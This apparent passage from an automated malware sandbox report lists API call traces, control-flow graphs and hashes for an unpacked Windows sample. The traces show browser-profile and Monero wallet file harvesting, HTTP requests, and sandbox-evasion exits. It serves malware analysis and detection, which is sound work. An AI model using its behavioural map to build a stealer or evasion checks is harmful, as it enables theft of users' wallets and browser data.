                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0
                                • Opcode ID: 65f229a0ce07b31e8857845a435aecdd9a12eb218c35c443b237118e81fde54a
                                • Instruction ID: b3d67fb0035381574fdb1f5f8460d9c7656d73e97f832ae9eeac960f82c8fc58
                                • Opcode Fuzzy Hash: 65f229a0ce07b31e8857845a435aecdd9a12eb218c35c443b237118e81fde54a
                                • Instruction Fuzzy Hash: 02312F70A40219AADB05FBF4DC56FEE7738EF04300F50851AF642A2282DF75A905DBB6

                                Control-flow Graph

                                control_flow_graph 1436 dd6af3 1437 dd6b0a 1436->1437 1439 dd6b0c-dd6b22 call dd6920 call dd5b10 CloseHandle ExitProcess 1437->1439 1440 dd6aba-dd6ad7 call ddaad0 OpenEventA 1437->1440 1446 dd6ad9-dd6af1 call ddaad0 CreateEventA 1440->1446 1447 dd6af5-dd6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DD6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00DD6AF9
                                • Sleep.KERNEL32(00001770), ref: 00DD6B04
                                • CloseHandle.KERNEL32(?,00000000,?,016290B8,?,00DE110C,?,00000000,?,00DE1110,?,00000000,00DE0AEF), ref: 00DD6B1A
                                • ExitProcess.KERNEL32 ref: 00DD6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 529e6353ecf24a43facb1374e9b41811afd8df4befaafdd4144a21db9e368fdc
                                • Instruction ID: a1ced10452afe4cc0ae1d578e706f443ea6d37b2abd254c4b8e52d529b33707b
                                • Opcode Fuzzy Hash: 529e6353ecf24a43facb1374e9b41811afd8df4befaafdd4144a21db9e368fdc
                                • Instruction Fuzzy Hash: E0F03A30A40319EEEB10ABA09C06BBD7A34FB04701F108517B583A22C5DBB59540DBB6

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: c4021c753d0111b2c199bc8e52c9abe088f63d3b9e2c8a8bcb225c279ceedd6c
                                • Instruction ID: fde87ba9d95dad7b0c7e5df290b0574374b127032f1899dbf88641bb2ade9204
                                • Opcode Fuzzy Hash: c4021c753d0111b2c199bc8e52c9abe088f63d3b9e2c8a8bcb225c279ceedd6c
                                • Instruction Fuzzy Hash: CE213E71D00209ABDF14DFA4E845ADD7B78FB45320F108626F959A7280EB706A05CBA1

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC6280: InternetOpenA.WININET(00DE0DFE,00000001,00000000,00000000,00000000), ref: 00DC62E1
                                  • Part of subcall function 00DC6280: StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6303
                                  • Part of subcall function 00DC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC6335
                                  • Part of subcall function 00DC6280: HttpOpenRequestA.WININET(00000000,GET,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC6385
                                  • Part of subcall function 00DC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DC63BF
                                  • Part of subcall function 00DC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00DD5228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 16de92c576fdda2e77d67ccd08491a5ee8392cd3429dae8f4aa6fc7df9ac9556
                                • Instruction ID: 4e4335f9bd68599d651c163c476dd8ef5819bef4022aac428c222fa8ffa106dc
                                • Opcode Fuzzy Hash: 16de92c576fdda2e77d67ccd08491a5ee8392cd3429dae8f4aa6fc7df9ac9556
                                • Instruction Fuzzy Hash: 7911EC30910158AACB14FF68DD52AED7738EF50300F808159F81A5B692EF74AB09D7B5

                                Control-flow Graph

                                Legend: Executed / Not Executed
                                Basic blocks (function at dc1220):
                                • 1493: dc1220-dc1247, call dd89b0, GlobalMemoryStatusEx
                                • 1496: dc1249-dc1271, call ddda00 (x2)
                                • 1497: dc1273-dc127a
                                • 1498: dc1281-dc1285
                                • 1500: dc129a-dc129d
                                • 1501: dc1287
                                • 1503: dc1289-dc1290
                                • 1504: dc1292-dc1294, ExitProcess
                                Edges: 1493->1496, 1493->1497, 1496->1498, 1497->1498, 1498->1500, 1498->1501, 1501->1503, 1501->1504, 1503->1500, 1503->1504
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00DC123E
                                • ExitProcess.KERNEL32 ref: 00DC1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 2586608c0d3dee5ef27ae79fe90cf0726b3401bab951d05e24632c073506d11b
                                • Instruction ID: dcb9b8f25f0b07b56526ccca6408ed3df0ca68d7fdf3abbef0eb438c7a357d2a
                                • Opcode Fuzzy Hash: 2586608c0d3dee5ef27ae79fe90cf0726b3401bab951d05e24632c073506d11b
                                • Instruction Fuzzy Hash: C8014FB4980318EAEF10EBD4CC4AFADB778EB15701F248149E605B7281D67455418BA9
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00DC112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00DC1132
                                • ExitProcess.KERNEL32 ref: 00DC1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 6905644567d5b98c1fff9c3a8099820f05b13e08099d49984a9219da64579622
                                • Instruction ID: ce94b053fd87ab7a9a933261b04710014fee691b07e6bd9b6db450db4a348936
                                • Opcode Fuzzy Hash: 6905644567d5b98c1fff9c3a8099820f05b13e08099d49984a9219da64579622
                                • Instruction Fuzzy Hash: 98E0E674A45318FFE7216BA09C0AF097678EB05B01F104055F709771C5D6B9664097A9
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00DC10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00DC10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: a50791db8210410e6a421ff1f1072c0946007d43516d82cd2574355ba468f670
                                • Instruction ID: a0263e541f5c97a438e87253afffeed17d8b578b1aa52ad29afac372875bbcaf
                                • Opcode Fuzzy Hash: a50791db8210410e6a421ff1f1072c0946007d43516d82cd2574355ba468f670
                                • Instruction Fuzzy Hash: 67F0E275641318BBEB149AA4AC59FAAB7E8E705B15F301448F544E3280D5729F00DBA0
                                APIs
                                  • Part of subcall function 00DD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DD7910
                                  • Part of subcall function 00DD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7917
                                  • Part of subcall function 00DD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00DD792F
                                  • Part of subcall function 00DD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DC11B7), ref: 00DD7880
                                  • Part of subcall function 00DD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00DD7887
                                  • Part of subcall function 00DD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DD789F
                                • ExitProcess.KERNEL32 ref: 00DC11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 2084dca4ae77cfa0c65d55eb82e9a0d92bfd117daa2fc9bfd62cbf94f15597a1
                                • Instruction ID: ae4481601485dd5c4276e05d2264f372c8c1979f8807cc34565f8610530bb5e4
                                • Opcode Fuzzy Hash: 2084dca4ae77cfa0c65d55eb82e9a0d92bfd117daa2fc9bfd62cbf94f15597a1
                                • Instruction Fuzzy Hash: A8E012B5A1431297CF1173F4AC0AF2A329CAB1534AF08042AFA09D3347FA2EE8009675
                                APIs
                                • wsprintfA.USER32 ref: 00DD38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD38E3
                                • lstrcat.KERNEL32(?,?), ref: 00DD3935
                                • StrCmpCA.SHLWAPI(?,00DE0F70), ref: 00DD3947
                                • StrCmpCA.SHLWAPI(?,00DE0F74), ref: 00DD395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD3C67
                                • FindClose.KERNEL32(000000FF), ref: 00DD3C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: d5f0222d4f6298ae045e2735d5c38ce614fab08688c8e3b35c5a3359e4ddb056
                                • Instruction ID: 98b468dbb109cd2f39ab16106c42da9fd223b8d0471e3ea24075cce31aaecee1
                                • Opcode Fuzzy Hash: d5f0222d4f6298ae045e2735d5c38ce614fab08688c8e3b35c5a3359e4ddb056
                                • Instruction Fuzzy Hash: DDA130B2A10318ABDB35EBA4DC85FEA7378FB48300F084589A54D97145EB759B84CF72
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00DE0B32,00DE0B2B,00000000,?,?,?,00DE13F4,00DE0B2A), ref: 00DCBEF5
                                • StrCmpCA.SHLWAPI(?,00DE13F8), ref: 00DCBF4D
                                • StrCmpCA.SHLWAPI(?,00DE13FC), ref: 00DCBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DCC7BF
                                • FindClose.KERNEL32(000000FF), ref: 00DCC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 6c4e14170615a4c89b573807485dd918a22955d54948cbf938ba22e0c26fc3ce
                                • Instruction ID: 5aa20f1a8c5d9fd873ea734e65554d34c1b8aaa9f17797030f4b25964d9650ef
                                • Opcode Fuzzy Hash: 6c4e14170615a4c89b573807485dd918a22955d54948cbf938ba22e0c26fc3ce
                                • Instruction Fuzzy Hash: 14423272910118ABCB14FB64DD96EED737DEF94300F408559F90A97281EE34AB49CBB2
                                APIs
                                • wsprintfA.USER32 ref: 00DD492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD4943
                                • StrCmpCA.SHLWAPI(?,00DE0FDC), ref: 00DD4971
                                • StrCmpCA.SHLWAPI(?,00DE0FE0), ref: 00DD4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD4B7D
                                • FindClose.KERNEL32(000000FF), ref: 00DD4B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 5d1651d9031ac8d88c50e51980faba63e0d8c01d191bacf695a7e38a1ed4b0fd
                                • Instruction ID: 6c74a8f6767fc7429b918bfee221752e9d9d406ddbe2c03110952075a99b5b7c
                                • Opcode Fuzzy Hash: 5d1651d9031ac8d88c50e51980faba63e0d8c01d191bacf695a7e38a1ed4b0fd
                                • Instruction Fuzzy Hash: 7C6132B1A00218ABCB31EBA0DC45FEA777CFB48700F048599A54A97145EA75DB89CFB1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DD4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD4587
                                • wsprintfA.USER32 ref: 00DD45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00DD45BD
                                • StrCmpCA.SHLWAPI(?,00DE0FC4), ref: 00DD45EB
                                • StrCmpCA.SHLWAPI(?,00DE0FC8), ref: 00DD4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00DD468B
                                • FindClose.KERNEL32(000000FF), ref: 00DD46A0
                                • lstrcat.KERNEL32(?,0162E9B8), ref: 00DD46C5
                                • lstrcat.KERNEL32(?,0162DD40), ref: 00DD46D8
                                • lstrlen.KERNEL32(?), ref: 00DD46E5
                                • lstrlen.KERNEL32(?), ref: 00DD46F6
                                Strings
                                Memory Dump Source
